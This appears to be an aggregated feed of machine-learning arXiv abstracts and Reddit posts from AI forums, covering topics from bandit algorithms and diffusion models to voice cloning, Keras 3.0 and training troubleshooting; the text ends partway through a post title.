    We study nonparametric contextual bandits where Lipschitz mean reward functions may change over time. We first establish the minimax dynamic regret rate in this less understood setting in terms of number of changes $L$ and total-variation $V$, both capturing all changes in distribution over context space, and argue that state-of-the-art procedures are suboptimal in this setting. Next, we tend to the question of an adaptivity for this setting, i.e. achieving the minimax rate without knowledge of $L$ or $V$. Quite importantly, we posit that the bandit problem, viewed locally at a given context $X_t$, should not be affected by reward changes in other parts of context space $\cal X$. We therefore propose a notion of change, which we term experienced significant shifts, that better accounts for locality, and thus counts considerably less changes than $L$ and $V$. Furthermore, similar to recent work on non-stationary MAB (Suk & Kpotufe, 2022), experienced significant shifts only count the most significant changes in mean rewards, e.g., severe best-arm changes relevant to observed contexts. Our main result is to show that this more tolerant notion of change can in fact be adapted to.
    Prediction intervals for neural network models using weighted asymmetric loss functions. (arXiv:2210.04318v4 [stat.ML] UPDATED)
    We propose a simple and efficient approach to generate a prediction intervals (PI) for approximated and forecasted trends. Our method leverages a weighted asymmetric loss function to estimate the lower and upper bounds of the PI, with the weights determined by its coverage probability. We provide a concise mathematical proof of the method, show how it can be extended to derive PIs for parametrised functions and argue why the method works for predicting PIs of dependent variables. The presented tests of the method on a real-world forecasting task using a neural network-based model show that it can produce reliable PIs in complex machine learning scenarios.
    Stochastic Nested Compositional Bi-level Optimization for Robust Feature Learning. (arXiv:2307.05384v1 [math.OC])
    We develop and analyze stochastic approximation algorithms for solving nested compositional bi-level optimization problems. These problems involve a nested composition of $T$ potentially non-convex smooth functions in the upper-level, and a smooth and strongly convex function in the lower-level. Our proposed algorithm does not rely on matrix inversions or mini-batches and can achieve an $\epsilon$-stationary solution with an oracle complexity of approximately $\tilde{O}_T(1/\epsilon^{2})$, assuming the availability of stochastic first-order oracles for the individual functions in the composition and the lower-level, which are unbiased and have bounded moments. Here, $\tilde{O}_T$ hides polylog factors and constants that depend on $T$. The key challenge we address in establishing this result relates to handling three distinct sources of bias in the stochastic gradients. The first source arises from the compositional nature of the upper-level, the second stems from the bi-level structure, and the third emerges due to the utilization of Neumann series approximations to avoid matrix inversion. To demonstrate the effectiveness of our approach, we apply it to the problem of robust feature learning for deep neural networks under covariate shift, showcasing the benefits and advantages of our methodology in that context.
    The Implicit Bias of Batch Normalization in Linear Models and Two-layer Linear Convolutional Neural Networks. (arXiv:2306.11680v2 [cs.LG] UPDATED)
    We study the implicit bias of batch normalization trained by gradient descent. We show that when learning a linear model with batch normalization for binary classification, gradient descent converges to a uniform margin classifier on the training data with an $\exp(-\Omega(\log^2 t))$ convergence rate. This distinguishes linear models with batch normalization from those without batch normalization in terms of both the type of implicit bias and the convergence rate. We further extend our result to a class of two-layer, single-filter linear convolutional neural networks, and show that batch normalization has an implicit bias towards a patch-wise uniform margin. Based on two examples, we demonstrate that patch-wise uniform margin classifiers can outperform the maximum margin classifiers in certain learning problems. Our results contribute to a better theoretical understanding of batch normalization.
    Comparison of High-Dimensional Bayesian Optimization Algorithms on BBOB. (arXiv:2303.00890v2 [cs.LG] UPDATED)
    Bayesian Optimization (BO) is a class of black-box, surrogate-based heuristics that can efficiently optimize problems that are expensive to evaluate, and hence admit only small evaluation budgets. BO is particularly popular for solving numerical optimization problems in industry, where the evaluation of objective functions often relies on time-consuming simulations or physical experiments. However, many industrial problems depend on a large number of parameters. This poses a challenge for BO algorithms, whose performance is often reported to suffer when the dimension grows beyond 15 variables. Although many new algorithms have been proposed to address this problem, it is not well understood which one is the best for which optimization scenario. In this work, we compare five state-of-the-art high-dimensional BO algorithms, with vanilla BO and CMA-ES on the 24 BBOB functions of the COCO environment at increasing dimensionality, ranging from 10 to 60 variables. Our results confirm the superiority of BO over CMA-ES for limited evaluation budgets and suggest that the most promising approach to improve BO is the use of trust regions. However, we also observe significant performance differences for different function landscapes and budget exploitation phases, indicating improvement potential, e.g., through hybridization of algorithmic components.
    A stochastic optimization approach to minimize robust density power-based divergences for general parametric density models. (arXiv:2307.05251v1 [stat.ME])
    Density power divergence (DPD) [Basu et al. (1998), Biometrika], designed to estimate the underlying distribution of the observations robustly, comprises an integral term of the power of the parametric density models to be estimated. While the explicit form of the integral term can be obtained for some specific densities (such as normal density and exponential density), its computational intractability has prohibited the application of DPD-based estimation to more general parametric densities, over a quarter of a century since the proposal of DPD. This study proposes a stochastic optimization approach to minimize DPD for general parametric density models and explains its adequacy by referring to conventional theories on stochastic optimization. The proposed approach also can be applied to the minimization of another density power-based $\gamma$-divergence with the aid of unnormalized models [Kanamori and Fujisawa (2015), Biometrika].
    BayesFlow: Amortized Bayesian Workflows With Neural Networks. (arXiv:2306.16015v2 [cs.LG] UPDATED)
    Modern Bayesian inference involves a mixture of computational techniques for estimating, validating, and drawing conclusions from probabilistic models as part of principled workflows for data analysis. Typical problems in Bayesian workflows are the approximation of intractable posterior distributions for diverse model types and the comparison of competing models of the same process in terms of their complexity and predictive performance. This manuscript introduces the Python library BayesFlow for simulation-based training of established neural network architectures for amortized data compression and inference. Amortized Bayesian inference, as implemented in BayesFlow, enables users to train custom neural networks on model simulations and re-use these networks for any subsequent application of the models. Since the trained networks can perform inference almost instantaneously, the upfront neural network training is quickly amortized.
    Geometric Neural Diffusion Processes. (arXiv:2307.05431v1 [stat.ML])
    Denoising diffusion models have proven to be a flexible and effective paradigm for generative modelling. Their recent extension to infinite dimensional Euclidean spaces has allowed for the modelling of stochastic processes. However, many problems in the natural sciences incorporate symmetries and involve data living in non-Euclidean spaces. In this work, we extend the framework of diffusion models to incorporate a series of geometric priors in infinite-dimension modelling. We do so by a) constructing a noising process which admits, as limiting distribution, a geometric Gaussian process that transforms under the symmetry group of interest, and b) approximating the score with a neural network that is equivariant w.r.t. this group. We show that with these conditions, the generative functional model admits the same symmetry. We demonstrate scalability and capacity of the model, using a novel Langevin-based conditional sampler, to fit complex scalar and vector fields, with Euclidean and spherical codomain, on synthetic and real-world weather data.
    Leveraging Variational Autoencoders for Parameterized MMSE Channel Estimation. (arXiv:2307.05352v1 [eess.SP])
    In this manuscript, we propose to utilize the generative neural network-based variational autoencoder for channel estimation. The variational autoencoder models the underlying true but unknown channel distribution as a conditional Gaussian distribution in a novel way. The derived channel estimator exploits the internal structure of the variational autoencoder to parameterize an approximation of the mean squared error optimal estimator resulting from the conditional Gaussian channel models. We provide a rigorous analysis under which conditions a variational autoencoder-based estimator is mean squared error optimal. We then present considerations that make the variational autoencoder-based estimator practical and propose three different estimator variants that differ in their access to channel knowledge during the training and evaluation phase. In particular, the proposed estimator variant trained solely on noisy pilot observations is particularly noteworthy as it does not require access to noise-free, ground-truth channel data during training or evaluation. Extensive numerical simulations first analyze the internal behavior of the variational autoencoder-based estimators and then demonstrate excellent channel estimation performance compared to related classical and machine learning-based state-of-the-art channel estimators.
    Reinforcement Learning with Non-Cumulative Objective. (arXiv:2307.04957v1 [cs.LG])
    In reinforcement learning, the objective is almost always defined as a \emph{cumulative} function over the rewards along the process. However, there are many optimal control and reinforcement learning problems in various application fields, especially in communications and networking, where the objectives are not naturally expressed as summations of the rewards. In this paper, we recognize the prevalence of non-cumulative objectives in various problems, and propose a modification to existing algorithms for optimizing such objectives. Specifically, we dive into the fundamental building block for many optimal control and reinforcement learning algorithms: the Bellman optimality equation. To optimize a non-cumulative objective, we replace the original summation operation in the Bellman update rule with a generalized operation corresponding to the objective. Furthermore, we provide sufficient conditions on the form of the generalized operation as well as assumptions on the Markov decision process under which the globally optimal convergence of the generalized Bellman updates can be guaranteed. We demonstrate the idea experimentally with the bottleneck objective, i.e., the objectives determined by the minimum reward along the process, on classical optimal control and reinforcement learning tasks, as well as on two network routing problems on maximizing the flow rates.
    Law of Large Numbers for Bayesian two-layer Neural Network trained with Variational Inference. (arXiv:2307.04779v1 [stat.ML])
    We provide a rigorous analysis of training by variational inference (VI) of Bayesian neural networks in the two-layer and infinite-width case. We consider a regression problem with a regularized evidence lower bound (ELBO) which is decomposed into the expected log-likelihood of the data and the Kullback-Leibler (KL) divergence between the a priori distribution and the variational posterior. With an appropriate weighting of the KL, we prove a law of large numbers for three different training schemes: (i) the idealized case with exact estimation of a multiple Gaussian integral from the reparametrization trick, (ii) a minibatch scheme using Monte Carlo sampling, commonly known as Bayes by Backprop, and (iii) a new and computationally cheaper algorithm which we introduce as Minimal VI. An important result is that all methods converge to the same mean-field limit. Finally, we illustrate our results numerically and discuss the need for the derivation of a central limit theorem.
    Perturbed-History Exploration in Stochastic Linear Bandits. (arXiv:1903.09132v2 [cs.LG] UPDATED)
    We propose a new online algorithm for cumulative regret minimization in a stochastic linear bandit. The algorithm pulls the arm with the highest estimated reward in a linear model trained on its perturbed history. Therefore, we call it perturbed-history exploration in a linear bandit (LinPHE). The perturbed history is a mixture of observed rewards and randomly generated i.i.d. pseudo-rewards. We derive a $\tilde{O}(d \sqrt{n})$ gap-free bound on the $n$-round regret of LinPHE, where $d$ is the number of features. The key steps in our analysis are new concentration and anti-concentration bounds on the weighted sum of Bernoulli random variables. To show the generality of our design, we generalize LinPHE to a logistic model. We evaluate our algorithms empirically and show that they are practical.
    Dynamics of Temporal Difference Reinforcement Learning. (arXiv:2307.04841v1 [stat.ML])
    Reinforcement learning has been successful across several applications in which agents have to learn to act in environments with sparse feedback. However, despite this empirical success there is still a lack of theoretical understanding of how the parameters of reinforcement learning models and the features used to represent states interact to control the dynamics of learning. In this work, we use concepts from statistical physics, to study the typical case learning curves for temporal difference learning of a value function with linear function approximators. Our theory is derived under a Gaussian equivalence hypothesis where averages over the random trajectories are replaced with temporally correlated Gaussian feature averages and we validate our assumptions on small scale Markov Decision Processes. We find that the stochastic semi-gradient noise due to subsampling the space of possible episodes leads to significant plateaus in the value error, unlike in traditional gradient descent dynamics. We study how learning dynamics and plateaus depend on feature structure, learning rate, discount factor, and reward function. We then analyze how strategies like learning rate annealing and reward shaping can favorably alter learning dynamics and plateaus. To conclude, our work introduces new tools to open a new direction towards developing a theory of learning dynamics in reinforcement learning.

  • Open

    MAMAY AI-powered algorithm digitises taste for food and beverage makers
    submitted by /u/trueslicky [link] [comments]  ( 8 min )
    Jesus in 2023 lmao
    submitted by /u/reinkrestfoxy [link] [comments]  ( 8 min )
    Can AI replicate a character's voice cracks and raspy voice?
    I used RVC V2 to make an AI model of a character whose voice is raspy, has a lot of voice cracks and has a very "shouty" voice. I used a dataset which was 70% of voice clips of him yelling and/or talking loudly and the rest were of him talking normally. The dataset was decent quality, I did have to use background music remover software on some parts but it's overall decent. The thing is, the model doesn't sound ANYTHING like the character. For some reason it's way too soft spoken, and even when it's supposed to be yelling or screaming it sounds kinda like he's whispering. The AI's neutral voice does sound like him but it's missing his voice cracks and voice raspiness. Is there any way I can mimic it? submitted by /u/donutpancito [link] [comments]  ( 8 min )
    Inside the AI Factory (about the underclass work force)
    submitted by /u/facinabush [link] [comments]  ( 8 min )
    Behind the secretive work of the many, many humans helping to train AI
    submitted by /u/facinabush [link] [comments]  ( 8 min )
    if you stare into the abyss, the abyss stares back at you
    I'm scared of AI but this is one of my favourite quotes and the result is magnificent submitted by /u/peditte [link] [comments]  ( 8 min )
    Anthropic releases Claude 2 with 100K token limit
    submitted by /u/wyem [link] [comments]  ( 8 min )
    AI Can Accurately Predict Potentially Fatal Cardiac Events in Firefighters
    submitted by /u/nist [link] [comments]  ( 8 min )
    Report: China to tighten rules around releasing generative AI tools
    submitted by /u/PleasantLiberation [link] [comments]  ( 8 min )
    AI Robots Admit They'd Run Earth Better Than 'Clouded' Humans
    submitted by /u/ChubbyBrunch [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/10/2023
    Just like other large chip designers, AMD has already started to use AI for designing chips. In fact, Lisa Su, chief executive of AMD, believes that eventually, AI-enabled tools will dominate chip design as the complexity of modern processors is increasing exponentially.[1] Comedian Sarah Silverman and two authors are suing Meta and ChatGPT-maker OpenAI, alleging the companies’ AI language models were trained on copyrighted materials from their books without their knowledge or consent.[2] Several hospitals, including the Mayo Clinic, have begun test-driving Google’s Med-PaLM 2, an AI chatbot that is widely expected to shake up the healthcare industry. Med-PaLM 2 is an updated model of PaLM2, which the tech giant announced at Google I/O earlier this year. PaLM 2 is the language model underpinning Google’s AI tool, Bard.[3] Japanese police will begin testing security cameras equipped with AI-based technology to protect high-profile public figures, Nikkei has learned, as the country mourns the anniversary of the fatal shooting of former Prime Minister Shinzo Abe on Saturday. The technology could lead to the detection of suspicious activity, supplementing existing security measures.[4] Sources: [1] https://www.tomshardware.com/news/lisa-su-ai-will-dominate-chip-design [2] https://www.cnn.com/2023/07/10/tech/sarah-silverman-openai-meta-lawsuit/index.html [3] https://www.foxbusiness.com/technology/hospitals-begin-test-driving-googles-medical-ai-chatbot-report [4] https://asia.nikkei.com/Politics/Japan-police-to-test-AI-equipped-cameras-in-protecting-VIPs submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    would disruptive denial of service AI be a viable option in internet malpractice since its progressed so much?
    title submitted by /u/Icy_Independence_125 [link] [comments]  ( 8 min )
  • Open

    [D] Regression for Everyone
    Check my article on Regression. I'd love to hear your thoughts ☺️ https://medium.com/@sandundayananda/regression-fef89ad7c68f submitted by /u/sandun-dayananda [link] [comments]  ( 8 min )
    [D] Masters of AI/Machine Learning
    I have a Bachelor's in Electrical Engineering, valedictorian, 4.00 out of 4.00 CGPA. IELTS 7.5 and have been working in the AI center in a research company for 3 months now. I have 2 papers published, one of them is Falcon B40. My employer asked me to pursue a master's degree in AI or machine learning. The tuition fees don't matter (Fully sponsored) The degree has to be certified as (Msc of Artificial intelligence) OR (Msc of Machine Learning) Not (Msc of Computer science) . University should be QS World Rank 100 to 200 I applied to: 1- Imperial College London 2- Monash Univerisity 3- Univerity Technology Sydney I need a fourth option? I prefer a university that provides a rigid background of computer science since I have an electrical engineering bachelors. Also, I must start maximum by spring 2024.. Thank you ❤️ submitted by /u/Maithah_x [link] [comments]  ( 9 min )
    [P]Benchmarking NVIDIA RAPIDS vs. Pandas: Join our Experiment with Thousands of GPUs!
    We are excited to announce a benchmarking experiment comparing the performance of NVIDIA RAPIDS and Pandas, two powerful data manipulation libraries, on a large Kubernetes-based cluster. Our cluster consists of thousands of A4000 GPUs, providing an excellent opportunity to evaluate these libraries for various workloads that involve data scrubbing. If you're interested in participating, we are offering the necessary compute resources, and you can even define your own datasets! What is NVIDIA RAPIDS? NVIDIA RAPIDS is a suite of open-source software libraries and APIs that accelerate data science and analytics workflows on GPUs. It aims to provide GPU-accelerated alternatives to popular data science tools, including Pandas. RAPIDS leverages the power of GPUs to speed up data processing, maki…  ( 9 min )
    [R] Semantic-SAM: Segment and Recognize Anything at Any Granularity
    We introduce Semantic-SAM, a universal image segmentation model to enable segment and recognize anything at any desired granularity. 🔥code & demo link: https://github.com/UX-Decoder/Semantic-SAM 🔥paper link: https://arxiv.org/pdf/2307.04767.pdf 🔥Our model offers the following attributes from instance to part level: Granularity Abundance. Our model can produce all possible segmentation granularities for a user click with high quality, which enables more **controllable** and **user-friendly** interactive segmentation. Semantic Awareness. We jointly train SA-1B with semantically labeled datasets to learn the semantics in both object-level and part-level. High Quality. We base on the DETR-based model to implement both generic and interactive segmentation, and validate that SA-1B hel…  ( 9 min )
    [D] Confusion over AMD GPU Ai benchmarking
    I'm using an ai benchmarker from this website, https://ai-benchmark.com/ranking_deeplearning.html. It was the only ai benchmarker I could find that I could understand. For some reason the results are in AMD's favor. I always thought ai wasn't good enough on AMD, but it's beating out the 4090! Am I using this benchmark wrong or has AMD really gotten good recently? Also if anyone knows another benchmark I could use, that would be wonderful. ​ ​ https://preview.redd.it/c779j1pb4ebb1.png?width=1565&format=png&auto=webp&s=d62f003587c73443cc83acf98f14a69c4ee14d2c submitted by /u/SociallyApparent [link] [comments]  ( 8 min )
    [P] Reward Prioritization
    Hi all! I will preface by saying I am very new to machine learning. I understand the fundamentals but have little practice in implementation. I am trying to create an AI to play a game that I have re-created in Python by using TensorFlow/Keras. The game is similar to Tetris, and the goal is for the user to survive for as long as possible and the user can score more points by making more complex moves. In my current situation, the game has been entirely coded and converted to a useable format for the AI (I used OpenAI’s Gymnasium (the open-source fork)). Over the last two days I have created the Neural Net model (5 Dense layers with 6 output options) and have been tweaking variables with little noticeable difference in the AI’s abilities. While I certainly need help in several areas and am open to any and all recommendations, I currently feel that my issues lie in the rewards. Currently the AI plays 5000 rounds, then keeps the best 10% of all games based on the reward score. Currently the longer it survives, the higher the reward. However, I also want the model to prioritize score similarly to survival time. To compare this to Tetris, the player could survive for 1 hour only scoring 1-liners, or 5 minutes scoring 90% Tetris’s and end up with a higher ‘score’ than the one that survives longer. I am looking for a compromise between these two extremes that will allow me to select the best 10% of all the games played. I know that I may not have explained this problem very well, but I am open to all suggestions, and all comments are appreciated. Thanks! submitted by /u/TCPisJustFancyUDP [link] [comments]  ( 9 min )
    "[D]" Problems with Lazy Config detectron2 (MViTv2)
    Hey. So, I want to use a config file from a detectron2 project which is undere MViTv2 in my custom dataset which is "my_dataset_train" (datacatalog format) I want to use this config file https://github.com/facebookresearch/detectron2/blob/main/projects/MViTv2/configs/mask_rcnn_mvitv2_t_3x.py like the beneath typical way I use a yaml config file. But giving so many errors one after another that, I even failed to count at this point. ​ I have to use this config file with the dataloader which is in https://github.com/facebookresearch/detectron2/blob/main/projects/MViTv2/configs/common/coco_loader.py. I figured that i can use cfg.dataloader.train.dataset.names = "my_dataset_train" for this. ​ cfg = LazyConfig.load("detectron2/projects/MViTv2/configs/mask_rcnn_mvitv2_t_3x.py") cfg.dataloader.train.dataset.names = "my_dataset_train" train = model_zoo.get_config("common/train.py").train cfg.train.amp.enabled = True cfg.train.ddp.fp16_compression = True cfg.lr_multiplier = L(WarmupParamScheduler)( scheduler=L(MultiStepParamScheduler)( values=[1.0, 0.1, 0.01], milestones=[52500, 62500, 67500], ), warmup_length=250 / train.max_iter, warmup_factor=0.001, ) # cfg.train.init_checkpoint = "detectron2://ImageNetPretrained/mvitv2/MViTv2_T_in1k.pyth" ​ cfg.dataloader.train.total_batch_size = 1 cfg.train.max_iter = 200 cfg.optimizer = model_zoo.get_config("common/optim.py").AdamW cfg.optimizer.lr = 1.6e-4 dataset = instantiate(cfg.dataloader.train) # optimizer = instantiate(cfg.optimizer) # optimizer = model_zoo.get_config("common/optim.py").A ​ # trainer = AMPTrainer(model, dataset, optimizer) trainer = DefaultTrainer(cfg) trainer.train() # FileLink(str(OUTPUT_MODEL)) ​ But typical trainer.train(start_iter,cfg.max_iter) is not working here? How can run this without shell command? Thanks everyone submitted by /u/Ok-Reflection-4049 [link] [comments]  ( 9 min )
    [D] Keras 3.0 Announcement: Keras for TensorFlow, JAX, and PyTorch
    Keras just announced a preview version of Keras 3.0. It's a full rewrite of the Keras codebase that rebases it on top of a modular backend architecture. It makes it possible to run Keras workflows on top of arbitrary frameworks — starting with TensorFlow, JAX, and PyTorch. https://keras.io/keras_core/announcement/ submitted by /u/codemaker1 [link] [comments]  ( 8 min )
    Backpropaagtion with Cross-Entropy and Softmax, HOW? [D]
    Let Zs be the input of the output layer (for example, Z1 is the input of the first neuron in the output layer), Os be the output of the output layer (which are actually the results of applying the softmax activation function to Zs, for example, O1 = softmax(Z1)), and Ys be the target values (which are 0 or 1 because in this example we are dealing with classification problems and using one-hot encoding). E is the sum of the neuron's loss using the CrossEntropy loss function. Let's say our neural network has 2 neurons, and Y1 = 1 (so Y2 = 0). What is the derivative of E with respect to Z1 and the derivative of E with respect to Z2? After calculations, I came to the conclusion that the value of all derivative of E with respects to Zs(Z1 and Z2) should be equal, becasue they are all equal to O1-1 ( since Y1 = 1 as i said), so am i right or wrong?(and why) submitted by /u/qaz_zaqi [link] [comments]  ( 9 min )
    Generating a step by step painting [D]
    I am thinking about this from a long time. Is there anyway that we can generate each step of painting from an image input. If I give an image as input, it should be able to give me step by step instructions on how to paint. I like painting but I got bored of You submitted by /u/dosa-palli-chutney [link] [comments]  ( 8 min )
    [D] Compared to paying a monthly subscription to ChatGPT, or per token for long-form content on the OpenAI platform, Is Poe.com's annual payment worth the money?
    Pretty much as the title says. I'm wondering whether it would be cheaper paying for PdfGPT, Claude2 and GPT-4 access separately, or Poe.com as a bundle? submitted by /u/RTSBasebuilder [link] [comments]  ( 8 min )
    [R] Why was Tacotron trained on <1000h of data?
    Tacotron TTS models (e.g. Tacotron 2 and Parallel Tacotron 2) were trained on 25h and 405h of speech data, respectively. By comparison, more recent TTS systems are trained on >50,000h of speech data. Why were Tacotron models trained on such a relatively small volume of data? Was it simply a matter of compute resource, or is there something in the Tacotron architecture/training set-up that explains the relatively small training size? submitted by /u/Upstairs_Buy_6243 [link] [comments]  ( 8 min )
    [Discussion] AWS Sagemaker Issue
    Hi everyone, I have data that included these columns: customer_id,product_id,product_title,product_category,star_rating Then I used these functions, codes with descriptions below, and AWS Sagemaker config for creating model training I tried to write a function for predicting 5 best products for 1 customer using this model using the deployed endpoint. https://preview.redd.it/i3b2pm099cbb1.jpg?width=966&format=pjpg&auto=webp&s=1aa12ca864e500c1d0bc0e823e8c9e88c0a36316 https://preview.redd.it/nolhkl299cbb1.jpg?width=1002&format=pjpg&auto=webp&s=8d49a232620361076d802fd20ee124fa8a7c2feb https://preview.redd.it/ge5ggs299cbb1.jpg?width=895&format=pjpg&auto=webp&s=c58b80ff6a2af85546563d0a257da4cc3540da9f https://preview.redd.it/slbqok299cbb1.jpg?width=1028&format=pjpg&auto=webp&s=5ee8c5733dde42f1eb7d113c5eb0e0a6d3ba739c https://preview.redd.it/zu3nun099cbb1.jpg?width=1018&format=pjpg&auto=webp&s=86a29a222ab05ef4d4ed5c4eaf6fc321e1cfe194 https://preview.redd.it/bk9qif299cbb1.jpg?width=826&format=pjpg&auto=webp&s=80169c891de0ff3dd2e98fb5be3aa9eaa29b35c6 https://preview.redd.it/n1yigg299cbb1.jpg?width=898&format=pjpg&auto=webp&s=5a3f09983f9cddda1e0772ce473271a84790055d Nevertheless, I got a strange issue and cannot resolve it( SSLError: SSL validation failed for https:// runtime.sagemaker.us-east-1.amazonaws.com/endpoints/ factorization-machines-2023-07-10-12-13-54-256/invocations EOF occurred in violation of protocol (_ssl.c:2396)). Could someone please help me explain this, give me a solution, or help me solve it? submitted by /u/Hung_98 [link] [comments]  ( 8 min )
    [D] Seeking Comprehensive Project Tutorial for Industry Popular ML Tech Stack
    Hi all, I have a MS that focused in AI/ML, and took a role for the last several years that was supposed to focus on ML but never did. I'm now looking for jobs in this area and want to be able to list understanding/proficiency in industry popular technologies on my resume. Specifically, I'm looking to incorporate the following: Data Preprocessing: Numpy, pandas, SQL for data extraction Machine Learning Frameworks: TensorFlow, PyTorch (perform GPU training), Keras, XGBoost, LightGBM Model Deployment and Scalability: Docker and Kubernetes Big Data Processing: Apache Spark, Hadoop Version Control: Git Cloud Services: AWS, Microsoft Azure, or Google Cloud Platform System: Unix-Based I know these individual technologies have their own tutorials and documentation online. Does anyone have a more comprehensive project/tutorial that integrates these technologies? I'd like to create my own project that I can put on my resume to demonstrate proficiency, but I'm feeling a bit overwhelmed learning the entire stack and how to integrate it. Thanks! submitted by /u/ruseriousrightnow [link] [comments]  ( 9 min )
    [D] Scaling Neuroscience Research Using Federated Learning
    https://ieeexplore.ieee.org/document/9433925 Research on Federated Learning and its applications moved a step forward! https://github.com/NevronAI/metisfl ​ ​ submitted by /u/No-Literature-1930 [link] [comments]  ( 8 min )
    [D] Weird loss behaviour with difusion models.
    Has anyone had this happen when training a diffusion model? : The loss decreases to a very low value (close to 0) quite early (around half the first epoch), and keeps oscillating there. Image quality is improving throughout training but the loss isn't really decreasing, just fluctuating around the same values. I had this happen when training pixel-space diffusion models (with latent diffusion the loss seems to decrease gradually), and when fine-tuning Stable Diffusion with textual inversion (loss isn't really decreasing whereas image quality is increasing). submitted by /u/theotherfellah [link] [comments]  ( 8 min )
    [R] Large Language Models as General Pattern Machines. In context, LLMs are capable of completing a wide variety of complex non linguistic patterns.
    Blog/Paper - https://general-pattern-machines.github.io/ submitted by /u/MysteryInc152 [link] [comments]  ( 8 min )
    [P] [R] Machine Unlearning Summary
    Hey, fellow data enthusiasts! We made a Kaggle notebook that delves into an intriguing concept called "Machine Unlearning: The Right to Be Forgotten." If you're interested in exploring the uncharted territory of reversing machine learning models and allowing data to be forgotten, this notebook is an absolute must-read! 📚 Notebook: https://www.kaggle.com/code/tamlhp/machine-unlearning-the-right-to-be-forgotten/ Overview: We all know how machine learning algorithms have transformed our lives by uncovering patterns and making predictions. However, what if we want to reverse this process and erase the knowledge acquired by these models? That's where machine unlearning comes into play, and this notebook provides an in-depth exploration of this cutting-edge concept. Key Highlights: Unde…  ( 9 min )
    [D] - Representation Learning MSc course: Videos + PyTorch exercises
    [🎥📚 Exciting NEWS, everyone! 🌟 ] - I'm ultra thrilled to announce that the first ever online #RepresentationLearniing MSc course is now publicly available. Ready to learn how to learn informative representations from images, proteins, and natural language? 🎓📹 1️⃣ Visit https://www.youtube.com/playlist?list=PL3mKiGE4zNJJ83K4c3IBka6eYfe6v71dS to access the full playlist of recorded lectures. 📖💡 2️⃣ Feel free to tag anyone who might be interested. 💬🤝 3️⃣ Spread the word and help us out! 🌍🗣️ 4️⃣ Github link with all the material: https://github.com/HHU-MMBS/RepresentationLearning_SS2023 It's our (together with Felix Michels, and Tim Kaiser) first attempt, thus be prepared for some mistakes along the way. Let us know how you like it! Have a great day, N.A. submitted by /u/black0017 [link] [comments]  ( 8 min )
    [P]Using lime for this ??
    hello peeps, so i implemented this - https://github.com/karndeepsingh/Extract_key_information_Document_understanding/blob/main/Fine_tuning_LayoutLMForTokenClassification_on_FUNSD.ipynb so the model predicticts the tokens and the bounding boxes (whether its a question or answer or other), i am trying to use lime here to validate the results but idk which lime explainer to use the text or the image ? this notebook uses OCR to get the words in the document. i dont get how to use lime here like what to look for ? submitted by /u/Affectionate_Win2460 [link] [comments]  ( 8 min )
    [R] A Survey of Machine Unlearning
    submitted by /u/KingsmanVince [link] [comments]  ( 8 min )
    [D] [R] Use cases for Generative AI in Robotics
    Hi everyone, Are there any use cases for Generative AI in Robotics apart from Autonomous Decision making? Am looking for other use cases within the Gen AI for our Cobots. I couldn't find any other use cases. Could you guys share your ideas and use cases? submitted by /u/Meeloveall [link] [comments]  ( 8 min )
  • Open

    DSC Weekly 11 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 11 July 2023 appeared first on Data Science Central.  ( 20 min )
  • Open

    An open-source gymnasium for machine learning assisted computer architecture design
    Posted by Amir Yazdanbakhsh, Research Scientist, and Vijay Janapa Reddi, Visiting Researcher, Google Research Computer Architecture research has a long history of developing simulators and tools to evaluate and shape the design of computer systems. For example, the SimpleScalar simulator was introduced in the late 1990s and allowed researchers to explore various microarchitectural ideas. Computer architecture simulators and tools, such as gem5, DRAMSys, and many more have played a significant role in advancing computer architecture research. Since then, these shared resources and infrastructure have benefited industry and academia and have enabled researchers to systematically build on each other's work, leading to significant advances in the field. Nonetheless, computer architectu…  ( 93 min )
  • Open

    Access private repos using the @remote decorator for Amazon SageMaker training workloads
    As more and more customers are looking to put machine learning (ML) workloads in production, there is a large push in organizations to shorten the development lifecycle of ML code. Many organizations prefer writing their ML code in a production-ready style in the form of Python methods and classes as opposed to an exploratory style […]  ( 8 min )
  • Open

    Russian transliteration hack
    I mentioned in the previous post that I had been poking around in HTML entities and noticed symbols for Fourier transforms and such. I also noticed HTML entities for Cyrillic letters. These entities have the form & + transliteration + cy;. For example, the Cyrillic letter П is based on the Greek letter Π and […] Russian transliteration hack first appeared on John D. Cook.  ( 5 min )
    Symbols for transforms
    I was looking through HTML entities and ran across ℱ. I searched for all entities ending in trf; and also found ℳ, ℒ, and ℨ. Apparently “trf” stands “transform” and these symbols are intended to be used to represent the Fourier transform, Mellin transform, Laplace transform, and z-transform. You would not know from the Unicode […] Symbols for transforms first appeared on John D. Cook.  ( 5 min )
  • Open

    Microsoft at ICALP 2023: Deploying cloud capacity robustly against power failures
    Efficiency is vital in the face of escalating demand for cloud resources. And efficient power management strategies address the bottleneck of power availability in datacenters. Learn how we optimize power allocation to support sustainable resource usage. The post Microsoft at ICALP 2023: Deploying cloud capacity robustly against power failures appeared first on Microsoft Research.  ( 11 min )
  • Open

    Sierra Division Studios Presents Three Epic Projects Built With NVIDIA Omniverse
    Jacob Norris is a 3D artist and the president, co-founder and creative director of Sierra Division Studios — an outsource studio specializing in digital 3D content creation.  ( 9 min )
  • Open

    GPT-4's details are leaked
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Intel reports high-rendering graphics with low-power GPUs
    submitted by /u/keghn [link] [comments]  ( 8 min )

  • Open

    Afro Pink
    submitted by /u/Akumetsu_971 [link] [comments]  ( 8 min )
    How could zero point energy help ai go to the next level ?
    I am curious about this mainly because many people are talking about uap ! The technology that powers these uap most likely are not oil or gas or batteries more likely zero point energy . My main question like i said how could it make ai even better to heights to where its never been before ! submitted by /u/jdgementdragonotk [link] [comments]  ( 8 min )
    What are some GitHub security best practices?
    It seems like about 90% of the stuff happening in AI is only accessible via GitHub. I'm probably just being overly cautious, but downloading something from such a public place is just not something I am currently comfortable with. What are your thought on this? Are there precautions you take that I should be aware of before venturing into this territory? Or is it just generally considered pretty safe, and nothing to worry about much? submitted by /u/gcubed [link] [comments]  ( 8 min )
    Offline music AI generator
    Hi all, i'm searching AI for music for my own game, so I want to find AI without copyright. But every model that i found were online with copyright rules. Is there any offline, better - opensource AI model? submitted by /u/krakotay1 [link] [comments]  ( 8 min )
    An open Source AI on a european server, readings PDFe (Texts), answering questions in different languages - pls help
